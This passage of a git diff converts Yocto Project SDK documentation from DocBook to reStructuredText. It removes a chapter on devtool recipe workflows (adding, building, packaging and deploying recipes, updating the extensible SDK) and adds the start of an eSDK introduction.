- <note>
- This step assumes you have a previously built
- image that is already either running in QEMU or
- running on actual hardware.
- Also, it is assumed that for deployment of the
- image to the target, SSH is installed in the image
- and if the image is running on real hardware that
- you have network access to and from your
- development machine.
- </note>
- You can deploy your build output to that target
- hardware by using the
- <filename>devtool deploy-target</filename> command:
- <literallayout class='monospaced'>
- $ devtool deploy-target <replaceable>recipe target</replaceable>
- </literallayout>
- The <replaceable>target</replaceable> is a live target
- machine running as an SSH server.</para>
-
- <para>You can, of course, also deploy the image you
- build using the
- <filename>devtool build-image</filename> command
- to actual hardware.
- However, <filename>devtool</filename> does not provide
- a specific command that allows you to do this.
- </para></listitem>
- <listitem><para>
- <emphasis>Finish Your Work With the Recipe</emphasis>:
- The <filename>devtool finish</filename> command creates
- any patches corresponding to commits in the local
- Git repository, moves the new recipe to a more
- permanent layer, and then resets the recipe so that
- the recipe is built normally rather than from the
- workspace.</para>
-
- <para>Any work you did in the
- <filename>oe-local-files</filename> directory is
- preserved in the original files next to the recipe
- during the <filename>devtool finish</filename>
- command.</para>
-
- <para>
- If you specify a destination layer that is the same as
- the original source, then the old version of the
- recipe and associated files are removed prior to
- adding the new version.
- <literallayout class='monospaced'>
- $ devtool finish <replaceable>recipe layer</replaceable>
- </literallayout>
- <note>
- Any changes you want to turn into patches must be
- committed to the Git repository in the source tree.
- </note></para>
-
- <para>As a final process of the
- <filename>devtool finish</filename> command, the state
- of the standard layers and the upstream source is
- restored so that you can build the recipe from those
- areas rather than the workspace.
- <note>
- You can use the <filename>devtool reset</filename>
- command to put things back should you decide you
- do not want to proceed with your work.
- If you do use this command, realize that the source
- tree is preserved.
- </note>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
- </section>
-
- <section id='sdk-a-closer-look-at-devtool-add'>
- <title>A Closer Look at <filename>devtool add</filename></title>
-
- <para>
- The <filename>devtool add</filename> command automatically creates
- a recipe based on the source tree you provide with the command.
- Currently, the command has support for the following:
- <itemizedlist>
- <listitem><para>
- Autotools (<filename>autoconf</filename> and
- <filename>automake</filename>)
- </para></listitem>
- <listitem><para>
- CMake
- </para></listitem>
- <listitem><para>
- Scons
- </para></listitem>
- <listitem><para>
- <filename>qmake</filename>
- </para></listitem>
- <listitem><para>
- Plain <filename>Makefile</filename>
- </para></listitem>
- <listitem><para>
- Out-of-tree kernel module
- </para></listitem>
- <listitem><para>
- Binary package (i.e. "-b" option)
- </para></listitem>
- <listitem><para>
- Node.js module
- </para></listitem>
- <listitem><para>
- Python modules that use <filename>setuptools</filename>
- or <filename>distutils</filename>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Apart from binary packages, the determination of how a source tree
- should be treated is automatic based on the files present within
- that source tree.
- For example, if a <filename>CMakeLists.txt</filename> file is found,
- then the source tree is assumed to be using
- CMake and is treated accordingly.
- <note>
- In most cases, you need to edit the automatically generated
- recipe in order to make it build properly.
- Typically, you would go through several edit and build cycles
- until the recipe successfully builds.
- Once the recipe builds, you could use possible further
- iterations to test the recipe on the target device.
- </note>
- </para>
-
- <para>
- The remainder of this section covers specifics regarding how parts
- of the recipe are generated.
- </para>
-
- <section id='sdk-name-and-version'>
- <title>Name and Version</title>
-
- <para>
- If you do not specify a name and version on the command
- line, <filename>devtool add</filename> uses various metadata
- within the source tree in an attempt to determine
- the name and version of the software being built.
- Based on what the tool determines, <filename>devtool</filename>
- sets the name of the created recipe file accordingly.
- </para>
-
- <para>
- If <filename>devtool</filename> cannot determine the name and
- version, the command prints an error.
- For such cases, you must re-run the command and provide
- the name and version, just the name, or just the version as
- part of the command line.
- </para>
-
- <para>
- Sometimes the name or version determined from the source tree
- might be incorrect.
- For such a case, you must reset the recipe:
- <literallayout class='monospaced'>
- $ devtool reset -n <replaceable>recipename</replaceable>
- </literallayout>
- After running the <filename>devtool reset</filename> command,
- you need to run <filename>devtool add</filename> again and
- provide the name or the version.
- </para>
- </section>
-
- <section id='sdk-dependency-detection-and-mapping'>
- <title>Dependency Detection and Mapping</title>
-
- <para>
- The <filename>devtool add</filename> command attempts to
- detect build-time dependencies and map them to other recipes
- in the system.
- During this mapping, the command fills in the names of those
- recipes as part of the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
- variable within the recipe.
- If a dependency cannot be mapped, <filename>devtool</filename>
- places a comment in the recipe indicating such.
- The inability to map a dependency can result from naming not
- being recognized or because the dependency simply is not
- available.
- For cases where the dependency is not available, you must use
- the <filename>devtool add</filename> command to add an
- additional recipe that satisfies the dependency.
- Once you add that recipe, you need to update the
- <filename>DEPENDS</filename> variable in the original recipe
- to include the new recipe.
- </para>
-
- <para>
- If you need to add runtime dependencies, you can do so by
- adding the following to your recipe:
- <literallayout class='monospaced'>
- RDEPENDS_${PN} += "<replaceable>dependency1 dependency2 ...</replaceable>"
- </literallayout>
- <note>
- The <filename>devtool add</filename> command often cannot
- distinguish between mandatory and optional dependencies.
- Consequently, some of the detected dependencies might
- in fact be optional.
- When in doubt, consult the documentation or the configure
- script for the software the recipe is building for further
- details.
- In some cases, you might find you can substitute the
- dependency with an option that disables the associated
- functionality passed to the configure script.
- </note>
- </para>
- </section>
-
- <section id='sdk-license-detection'>
- <title>License Detection</title>
-
- <para>
- The <filename>devtool add</filename> command attempts to
- determine if the software you are adding is able to be
- distributed under a common, open-source license.
- If so, the command sets the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE</filename></ulink>
- value accordingly.
- You should double-check the value added by the command against
- the documentation or source files for the software you are
- building and, if necessary, update that
- <filename>LICENSE</filename> value.
- </para>
-
- <para>
- The <filename>devtool add</filename> command also sets the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></ulink>
- value to point to all files that appear to be license-related.
- Realize that license statements often appear in comments at
- the top of source files or within the documentation.
- In such cases, the command does not recognize those license
- statements.
- Consequently, you might need to amend the
- <filename>LIC_FILES_CHKSUM</filename> variable to point to one
- or more of those comments if present.
- Setting <filename>LIC_FILES_CHKSUM</filename> is particularly
- important for third-party software.
- The mechanism attempts to ensure correct licensing should you
- upgrade the recipe to a newer upstream version in future.
- Any change in licensing is detected and you receive an error
- prompting you to check the license text again.
- </para>
-
- <para>
- If the <filename>devtool add</filename> command cannot
- determine licensing information, <filename>devtool</filename>
- sets the <filename>LICENSE</filename> value to "CLOSED" and
- leaves the <filename>LIC_FILES_CHKSUM</filename> value unset.
- This behavior allows you to continue with development even
- though the settings are unlikely to be correct in all cases.
- You should check the documentation or source files for the
- software you are building to determine the actual license.
- </para>
- </section>
-
- <section id='sdk-adding-makefile-only-software'>
- <title>Adding Makefile-Only Software</title>
-
- <para>
- The use of Make by itself is very common in both proprietary
- and open-source software.
- Unfortunately, Makefiles are often not written with
- cross-compilation in mind.
- Thus, <filename>devtool add</filename> often cannot do very
- much to ensure that these Makefiles build correctly.
- It is very common, for example, to explicitly call
- <filename>gcc</filename> instead of using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink>
- variable.
- Usually, in a cross-compilation environment,
- <filename>gcc</filename> is the compiler for the build host
- and the cross-compiler is named something similar to
- <filename>arm-poky-linux-gnueabi-gcc</filename> and might
- require arguments (e.g. to point to the associated sysroot
- for the target machine).
- </para>
-
- <para>
- When writing a recipe for Makefile-only software, keep the
- following in mind:
- <itemizedlist>
- <listitem><para>
- You probably need to patch the Makefile to use
- variables instead of hardcoding tools within the
- toolchain such as <filename>gcc</filename> and
- <filename>g++</filename>.
- </para></listitem>
- <listitem><para>
- The environment in which Make runs is set up with
- various standard variables for compilation (e.g.
- <filename>CC</filename>, <filename>CXX</filename>, and
- so forth) in a similar manner to the environment set
- up by the SDK's environment setup script.
- One easy way to see these variables is to run the
- <filename>devtool build</filename> command on the
- recipe and then look in
- <filename>oe-logs/run.do_compile</filename>.
- Towards the top of this file, a list of environment
- variables exists that are being set.
- You can take advantage of these variables within the
- Makefile.
- </para></listitem>
- <listitem><para>
- If the Makefile sets a default for a variable using "=",
- that default overrides the value set in the environment,
- which is usually not desirable.
- For this case, you can either patch the Makefile
- so it sets the default using the "?=" operator, or
- you can alternatively force the value on the
- <filename>make</filename> command line.
- To force the value on the command line, add the
- variable setting to
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
- within the recipe.
- Here is an example using <filename>EXTRA_OEMAKE</filename>:
- <literallayout class='monospaced'>
- EXTRA_OEMAKE += "'CC=${CC}' 'CXX=${CXX}'"
- </literallayout>
- In the above example, single quotes are used around the
- variable settings as the values are likely to contain
- spaces because required default options are passed to
- the compiler.
- </para></listitem>
- <listitem><para>
- Hardcoding paths inside Makefiles is often problematic
- in a cross-compilation environment.
- This is particularly true because those hardcoded paths
- often point to locations on the build host and thus
- will either be read-only or will introduce
- contamination into the cross-compilation because they
- are specific to the build host rather than the target.
- Patching the Makefile to use prefix variables or other
- path variables is usually the way to handle this
- situation.
- </para></listitem>
- <listitem><para>
- Sometimes a Makefile runs target-specific commands such
- as <filename>ldconfig</filename>.
- For such cases, you might be able to apply patches that
- remove these commands from the Makefile.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='sdk-adding-native-tools'>
- <title>Adding Native Tools</title>
-
- <para>
- Often, you need to build additional tools that run on the
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>
- as opposed to the target.
- You should indicate this requirement by using one of the
- following methods when you run
- <filename>devtool add</filename>:
- <itemizedlist>
- <listitem><para>
- Specify the name of the recipe such that it ends
- with "-native".
- Specifying the name like this produces a recipe that
- only builds for the build host.
- </para></listitem>
- <listitem><para>
- Specify the "&dash;&dash;also-native" option with the
- <filename>devtool add</filename> command.
- Specifying this option creates a recipe file that still
- builds for the target but also creates a variant with
- a "-native" suffix that builds for the build host.
- </para></listitem>
- </itemizedlist>
- <note>
- If you need to add a tool that is shipped as part of a
- source tree that builds code for the target, you can
- typically accomplish this by building the native and target
- parts separately rather than within the same compilation
- process.
- Realize though that with the "&dash;&dash;also-native"
- option, you can add the tool using just one recipe file.
- </note>
- </para>
- </section>
-
- <section id='sdk-adding-node-js-modules'>
- <title>Adding Node.js Modules</title>
-
- <para>
- You can use the <filename>devtool add</filename> command two
- different ways to add Node.js modules: 1) Through
- <filename>npm</filename> and, 2) from a repository or local
- source.
- </para>
-
- <para>
- Use the following form to add Node.js modules through
- <filename>npm</filename>:
- <literallayout class='monospaced'>
- $ devtool add "npm://registry.npmjs.org;name=forever;version=0.15.1"
- </literallayout>
- The name and version parameters are mandatory.
- Lockdown and shrinkwrap files are generated and pointed to by
- the recipe in order to freeze the version that is fetched for
- the dependencies according to the first time.
- This also saves checksums that are verified on future fetches.
- Together, these behaviors ensure the reproducibility and
- integrity of the build.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- You must use quotes around the URL.
- The <filename>devtool add</filename> does not require
- the quotes, but the shell considers ";" as a splitter
- between multiple commands.
- Thus, without the quotes,
- <filename>devtool add</filename> does not receive the
- other parts, which results in several "command not
- found" errors.
- </para></listitem>
- <listitem><para>
- In order to support adding Node.js modules, a
- <filename>nodejs</filename> recipe must be part
- of your SDK.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- As mentioned earlier, you can also add Node.js modules
- directly from a repository or local source tree.
- To add modules this way, use <filename>devtool add</filename>
- in the following form:
- <literallayout class='monospaced'>
- $ devtool add https://github.com/diversario/node-ssdp
- </literallayout>
- In this example, <filename>devtool</filename> fetches the
- specified Git repository, detects the code as Node.js
- code, fetches dependencies using <filename>npm</filename>, and
- sets
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- accordingly.
- </para>
- </section>
- </section>
-
- <section id='sdk-working-with-recipes'>
- <title>Working With Recipes</title>
-
- <para>
- When building a recipe using the
- <filename>devtool build</filename> command, the typical build
- progresses as follows:
- <orderedlist>
- <listitem><para>
- Fetch the source
- </para></listitem>
- <listitem><para>
- Unpack the source
- </para></listitem>
- <listitem><para>
- Configure the source
- </para></listitem>
- <listitem><para>
- Compile the source
- </para></listitem>
- <listitem><para>
- Install the build output
- </para></listitem>
- <listitem><para>
- Package the installed output
- </para></listitem>
- </orderedlist>
- For recipes in the workspace, fetching and unpacking is disabled
- as the source tree has already been prepared and is persistent.
- Each of these build steps is defined as a function (task), usually
- with a "do_" prefix (e.g.
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>,
- and so forth).
- These functions are typically shell scripts but can instead be
- written in Python.
- </para>
-
- <para>
- If you look at the contents of a recipe, you will see that the
- recipe does not include complete instructions for building the
- software.
- Instead, common functionality is encapsulated in classes inherited
- with the <filename>inherit</filename> directive.
- This technique leaves the recipe to describe just the things that
- are specific to the software being built.
- A
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-base'><filename>base</filename></ulink>
- class exists that is implicitly inherited by all recipes and
- provides the functionality that most recipes typically need.
- </para>
-
- <para>
- The remainder of this section presents information useful when
- working with recipes.
- </para>
-
- <section id='sdk-finding-logs-and-work-files'>
- <title>Finding Logs and Work Files</title>
-
- <para>
- After the first run of the <filename>devtool build</filename>
- command, recipes that were previously created using the
- <filename>devtool add</filename> command or whose sources were
- modified using the <filename>devtool modify</filename>
- command contain symbolic links created within the source tree:
- <itemizedlist>
- <listitem><para>
- <filename>oe-logs</filename>:
- This link points to the directory in which log files
- and run scripts for each build step are created.
- </para></listitem>
- <listitem><para>
- <filename>oe-workdir</filename>:
- This link points to the temporary work area for the
- recipe.
- The following locations under
- <filename>oe-workdir</filename> are particularly
- useful:
- <itemizedlist>
- <listitem><para>
- <filename>image/</filename>:
- Contains all of the files installed during
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- stage.
- Within a recipe, this directory is referred
- to by the expression
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink><filename>}</filename>.
- </para></listitem>
- <listitem><para>
- <filename>sysroot-destdir/</filename>:
- Contains a subset of files installed within
- <filename>do_install</filename> that have
- been put into the shared sysroot.
- For more information, see the
- "<link linkend='sdk-sharing-files-between-recipes'>Sharing Files Between Recipes</link>"
- section.
- </para></listitem>
- <listitem><para>
- <filename>packages-split/</filename>:
- Contains subdirectories for each package
- produced by the recipe.
- For more information, see the
- "<link linkend='sdk-packaging'>Packaging</link>"
- section.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </itemizedlist>
- You can use these links to get more information on what is
- happening at each build step.
- </para>
- </section>
-
- <section id='sdk-setting-configure-arguments'>
- <title>Setting Configure Arguments</title>
-
- <para>
- If the software your recipe is building uses GNU autoconf,
- then a fixed set of arguments is passed to it to enable
- cross-compilation plus any extras specified by
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
- set within the recipe.
- If you wish to pass additional options, add them to
- <filename>EXTRA_OECONF</filename> or
- <filename>PACKAGECONFIG_CONFARGS</filename>.
- Other supported build tools have similar variables
- (e.g.
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OECMAKE'><filename>EXTRA_OECMAKE</filename></ulink>
- for CMake,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OESCONS'><filename>EXTRA_OESCONS</filename></ulink>
- for Scons, and so forth).
- If you need to pass anything on the <filename>make</filename>
- command line, you can use <filename>EXTRA_OEMAKE</filename> or the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
- variables to do so.
- </para>
-
- <para>
- You can use the <filename>devtool configure-help</filename> command
- to help you set the arguments listed in the previous paragraph.
- The command determines the exact options being passed, and shows
- them to you along with any custom arguments specified through
- <filename>EXTRA_OECONF</filename> or
- <filename>PACKAGECONFIG_CONFARGS</filename>.
- If applicable, the command also shows you the output of the
- configure script's "&dash;&dash;help" option as a reference.
- </para>
- </section>
-
- <section id='sdk-sharing-files-between-recipes'>
- <title>Sharing Files Between Recipes</title>
-
- <para>
- Recipes often need to use files provided by other recipes on
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>.
- For example, an application linking to a common library needs
- access to the library itself and its associated headers.
- The way this access is accomplished within the extensible SDK is
- through the sysroot.
- One sysroot exists per "machine" for which the SDK is being
- built.
- In practical terms, this means a sysroot exists for the target
- machine, and a sysroot exists for the build host.
- </para>
-
- <para>
- Recipes should never write files directly into the sysroot.
- Instead, files should be installed into standard locations
- during the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- task within the
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink><filename>}</filename>
- directory.
- A subset of these files automatically goes into the sysroot.
- The reason for this limitation is that almost all files that go
- into the sysroot are cataloged in manifests in order to ensure
- they can be removed later when a recipe is modified or removed.
- Thus, the sysroot is able to remain free from stale files.
- </para>
- </section>
-
- <section id='sdk-packaging'>
- <title>Packaging</title>
-
- <para>
- Packaging is not always particularly relevant within the
- extensible SDK.
- However, if you examine how build output gets into the final image
- on the target device, it is important to understand packaging
- because the contents of the image are expressed in terms of
- packages and not recipes.
- </para>
-
- <para>
- During the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
- task, files installed during the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- task are split into one main package, which is almost always
- named the same as the recipe, and into several other packages.
- This separation exists because not all of those installed files
- are useful in every image.
- For example, you probably do not need any of the documentation
- installed in a production image.
- Consequently, for each recipe the documentation files are
- separated into a <filename>-doc</filename> package.
- Recipes that package software containing optional modules or
- plugins might undergo additional package splitting as well.
- </para>
-
- <para>
- After building a recipe, you can see where files have gone by
- looking in the <filename>oe-workdir/packages-split</filename>
- directory, which contains a subdirectory for each package.
- Apart from some advanced cases, the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>
- variables controls splitting.
- The <filename>PACKAGES</filename> variable lists all of the
- packages to be produced, while the <filename>FILES</filename>
- variable specifies which files to include in each package by
- using an override to specify the package.
- For example, <filename>FILES_${PN}</filename> specifies the
- files to go into the main package (i.e. the main package has
- the same name as the recipe and
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>
- evaluates to the recipe name).
- The order of the <filename>PACKAGES</filename> value is
- significant.
- For each installed file, the first package whose
- <filename>FILES</filename> value matches the file is the
- package into which the file goes.
- Defaults exist for both the <filename>PACKAGES</filename> and
- <filename>FILES</filename> variables.
- Consequently, you might find you do not even need to set these
- variables in your recipe unless the software the recipe is
- building installs files into non-standard locations.
- </para>
- </section>
- </section>
-
- <section id='sdk-restoring-the-target-device-to-its-original-state'>
- <title>Restoring the Target Device to its Original State</title>
-
- <para>
- If you use the <filename>devtool deploy-target</filename>
- command to write a recipe's build output to the target, and
- you are working on an existing component of the system, then you
- might find yourself in a situation where you need to restore the
- original files that existed prior to running the
- <filename>devtool deploy-target</filename> command.
- Because the <filename>devtool deploy-target</filename> command
- backs up any files it overwrites, you can use the
- <filename>devtool undeploy-target</filename> command to restore
- those files and remove any other files the recipe deployed.
- Consider the following example:
- <literallayout class='monospaced'>
- $ devtool undeploy-target lighttpd root@192.168.7.2
- </literallayout>
- If you have deployed multiple applications, you can remove them
- all using the "-a" option thus restoring the target device to its
- original state:
- <literallayout class='monospaced'>
- $ devtool undeploy-target -a root@192.168.7.2
- </literallayout>
- Information about files deployed to the target as well as any
- backed up files are stored on the target itself.
- This storage, of course, requires some additional space
- on the target machine.
- <note>
- The <filename>devtool deploy-target</filename> and
- <filename>devtool undeploy-target</filename> commands do not
- currently interact with any package management system on the
- target device (e.g. RPM or OPKG).
- Consequently, you should not intermingle
- <filename>devtool deploy-target</filename> and package
- manager operations on the target device.
- Doing so could result in a conflicting set of files.
- </note>
- </para>
- </section>
-
- <section id='sdk-installing-additional-items-into-the-extensible-sdk'>
- <title>Installing Additional Items Into the Extensible SDK</title>
-
- <para>
- Out of the box the extensible SDK typically only comes with a small
- number of tools and libraries.
- A minimal SDK starts mostly empty and is populated on-demand.
- Sometimes you must explicitly install extra items into the SDK.
- If you need these extra items, you can first search for the items
- using the <filename>devtool search</filename> command.
- For example, suppose you need to link to libGL but you are not sure
- which recipe provides libGL.
- You can use the following command to find out:
- <literallayout class='monospaced'>
- $ devtool search libGL
- mesa A free implementation of the OpenGL API
- </literallayout>
- Once you know the recipe (i.e. <filename>mesa</filename> in this
- example), you can install it:
- <literallayout class='monospaced'>
- $ devtool sdk-install mesa
- </literallayout>
- By default, the <filename>devtool sdk-install</filename> command
- assumes the item is available in pre-built form from your SDK
- provider.
- If the item is not available and it is acceptable to build the item
- from source, you can add the "-s" option as follows:
- <literallayout class='monospaced'>
- $ devtool sdk-install -s mesa
- </literallayout>
- It is important to remember that building the item from source
- takes significantly longer than installing the pre-built artifact.
- Also, if no recipe exists for the item you want to add to the SDK,
- you must instead add the item using the
- <filename>devtool add</filename> command.
- </para>
- </section>
-
- <section id='sdk-applying-updates-to-an-installed-extensible-sdk'>
- <title>Applying Updates to an Installed Extensible SDK</title>
-
- <para>
- If you are working with an installed extensible SDK that gets
- occasionally updated (e.g. a third-party SDK), then you will need
- to manually "pull down" the updates into the installed SDK.
- </para>
-
- <para>
- To update your installed SDK, use <filename>devtool</filename> as
- follows:
- <literallayout class='monospaced'>
- $ devtool sdk-update
- </literallayout>
- The previous command assumes your SDK provider has set the default
- update URL for you through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_UPDATE_URL'><filename>SDK_UPDATE_URL</filename></ulink>
- variable as described in the
- "<link linkend='sdk-providing-updates-to-the-extensible-sdk-after-installation'>Providing Updates to the Extensible SDK After Installation</link>"
- section.
- If the SDK provider has not set that default URL, you need to
- specify it yourself in the command as follows:
- <literallayout class='monospaced'>
- $ devtool sdk-update <replaceable>path_to_update_directory</replaceable>
- </literallayout>
- <note>
- The URL needs to point specifically to a published SDK and
- not to an SDK installer that you would download and install.
- </note>
- </para>
- </section>
-
- <section id='sdk-creating-a-derivative-sdk-with-additional-components'>
- <title>Creating a Derivative SDK With Additional Components</title>
-
- <para>
- You might need to produce an SDK that contains your own custom
- libraries.
- A good example would be if you were a vendor with customers that
- use your SDK to build their own platform-specific software and
- those customers need an SDK that has custom libraries.
- In such a case, you can produce a derivative SDK based on the
- currently installed SDK fairly easily by following these steps:
- <orderedlist>
- <listitem><para>
- If necessary, install an extensible SDK that
- you want to use as a base for your derivative SDK.
- </para></listitem>
- <listitem><para>
- Source the environment script for the SDK.
- </para></listitem>
- <listitem><para>
- Add the extra libraries or other components you want by
- using the <filename>devtool add</filename> command.
- </para></listitem>
- <listitem><para>
- Run the <filename>devtool build-sdk</filename> command.
- </para></listitem>
- </orderedlist>
- The previous steps take the recipes added to the workspace and
- construct a new SDK installer that contains those recipes and the
- resulting binary artifacts.
- The recipes go into their own separate layer in the constructed
- derivative SDK, which leaves the workspace clean and ready for
- users to add their own recipes.
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-intro.rst b/documentation/sdk-manual/sdk-intro.rst
new file mode 100644
index 0000000000..acb3f455c5
--- /dev/null
+++ b/documentation/sdk-manual/sdk-intro.rst
@@ -0,0 +1,224 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************
+Introduction
+************
+
+.. _sdk-manual-intro:
+
+eSDK Introduction
+=================
+
+Welcome to the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) manual. This manual provides information
+that explains how to use both the Yocto Project extensible and standard
+SDKs to develop applications and images.
+
+.. note::
+
+ Prior to the 2.0 Release of the Yocto Project, application
+ development was primarily accomplished through the use of the
+ Application Development Toolkit (ADT) and the availability of
+ stand-alone cross-development toolchains and other tools. With the
+ 2.1 Release of the Yocto Project, application development has
+ transitioned to within a tool-rich extensible SDK and the more
+ traditional standard SDK.
+
+All SDKs consist of the following:
+
+- *Cross-Development Toolchain*: This toolchain contains a compiler,
+ debugger, and various miscellaneous tools.
+
+- *Libraries, Headers, and Symbols*: The libraries, headers, and
+ symbols are specific to the image (i.e. they match the image).
+
+- *Environment Setup Script*: This ``*.sh`` file, once run, sets up the
+ cross-development environment by defining variables and preparing for
+ SDK use.
+
+Additionally, an extensible SDK has tools that allow you to easily add
+new applications and libraries to an image, modify the source of an
+existing component, test changes on the target hardware, and easily
+integrate an application into the :term:`OpenEmbedded Build System`.
+
+You can use an SDK to independently develop and test code that is
+destined to run on some target machine. SDKs are completely
+self-contained. The binaries are linked against their own copy of
+``libc``, which results in no dependencies on the target system. To
+achieve this, the pointer to the dynamic loader is configured at install
+time since that path cannot be dynamically altered. This is the reason
+for a wrapper around the ``populate_sdk`` and ``populate_sdk_ext``
+archives.
+
+Another feature for the SDKs is that only one set of cross-compiler
+toolchain binaries are produced for any given architecture. This feature
+takes advantage of the fact that the target hardware can be passed to
+``gcc`` as a set of compiler options. Those options are set up by the
+environment script and contained in variables such as
+:term:`CC` and
+:term:`LD`. This reduces the space needed
+for the tools. Understand, however, that every target still needs a
+sysroot because those binaries are target-specific.
+
+The SDK development environment consists of the following:
+
+- The self-contained SDK, which is an architecture-specific
+ cross-toolchain and matching sysroots (target and native) all built
+ by the OpenEmbedded build system (e.g. the SDK). The toolchain and
+ sysroots are based on a :term:`Metadata`
+ configuration and extensions, which allows you to cross-develop on
+ the host machine for the target hardware. Additionally, the
+ extensible SDK contains the ``devtool`` functionality.
+
+- The Quick EMUlator (QEMU), which lets you simulate target hardware.
+ QEMU is not literally part of the SDK. You must build and include
+ this emulator separately. However, QEMU plays an important role in
+ the development process that revolves around use of the SDK.
+
+In summary, the extensible and standard SDK share many features.
+However, the extensible SDK has powerful development tools to help you
+more quickly develop applications. Following is a table that summarizes
+the primary differences between the standard and extensible SDK types
+when considering which to build:
+
++-----------------------+-----------------------+-----------------------+
+| *Feature* | *Standard SDK* | *Extensible SDK* |
++=======================+=======================+=======================+
+| Toolchain | Yes | Yes [1]_ |
++-----------------------+-----------------------+-----------------------+
+| Debugger | Yes | Yes [1]_ |
++-----------------------+-----------------------+-----------------------+
+| Size | 100+ MBytes | 1+ GBytes (or 300+ |
+| | | MBytes for minimal |
+| | | w/toolchain) |
++-----------------------+-----------------------+-----------------------+
+| ``devtool`` | No | Yes |
++-----------------------+-----------------------+-----------------------+
+| Build Images | No | Yes |
++-----------------------+-----------------------+-----------------------+
+| Updateable | No | Yes |
++-----------------------+-----------------------+-----------------------+
+| Managed Sysroot [2]_ | No | Yes |
++-----------------------+-----------------------+-----------------------+
+| Installed Packages | No [3]_ | Yes [4]_ |
++-----------------------+-----------------------+-----------------------+
+| Construction | Packages | Shared State |
++-----------------------+-----------------------+-----------------------+
+
+.. [1] Extensible SDK contains the toolchain and debugger if :term:`SDK_EXT_TYPE`
+ is "full" or :term:`SDK_INCLUDE_TOOLCHAIN` is "1", which is the default.
+.. [2] Sysroot is managed through the use of ``devtool``. Thus, it is less
+ likely that you will corrupt your SDK sysroot when you try to add
+ additional libraries.
+.. [3] You can add runtime package management to the standard SDK but it is not
+ supported by default.
+.. [4] You must build and make the shared state available to extensible SDK
+ users for "packages" you want to enable users to install.
+
+The Cross-Development Toolchain
+-------------------------------
+
+The :term:`Cross-Development Toolchain` consists
+of a cross-compiler, cross-linker, and cross-debugger that are used to
+develop user-space applications for targeted hardware. Additionally, for
+an extensible SDK, the toolchain also has built-in ``devtool``
+functionality. This toolchain is created by running a SDK installer
+script or through a :term:`Build Directory` that is based on
+your metadata configuration or extension for your targeted device. The
+cross-toolchain works with a matching target sysroot.
+
+.. _sysroot:
+
+Sysroots
+--------
+
+The native and target sysroots contain needed headers and libraries for
+generating binaries that run on the target architecture. The target
+sysroot is based on the target root filesystem image that is built by
+the OpenEmbedded build system and uses the same metadata configuration
+used to build the cross-toolchain.
+
+The QEMU Emulator
+-----------------
+
+The QEMU emulator allows you to simulate your hardware while running
+your application or image. QEMU is not part of the SDK but is made
+available a number of different ways:
+
+- If you have cloned the ``poky`` Git repository to create a
+ :term:`Source Directory` and you have
+ sourced the environment setup script, QEMU is installed and
+ automatically available.
+
+- If you have downloaded a Yocto Project release and unpacked it to
+ create a Source Directory and you have sourced the environment setup
+ script, QEMU is installed and automatically available.
+
+- If you have installed the cross-toolchain tarball and you have
+ sourced the toolchain's setup environment script, QEMU is also
+ installed and automatically available.
+
+SDK Development Model
+=====================
+
+Fundamentally, the SDK fits into the development process as follows:
+
+.. image:: figures/sdk-environment.png
+ :align: center
+
+The SDK is installed on any machine and can be used to develop applications,
+images, and kernels. An SDK can even be used by a QA Engineer or Release
+Engineer. The fundamental concept is that the machine that has the SDK
+installed does not have to be associated with the machine that has the
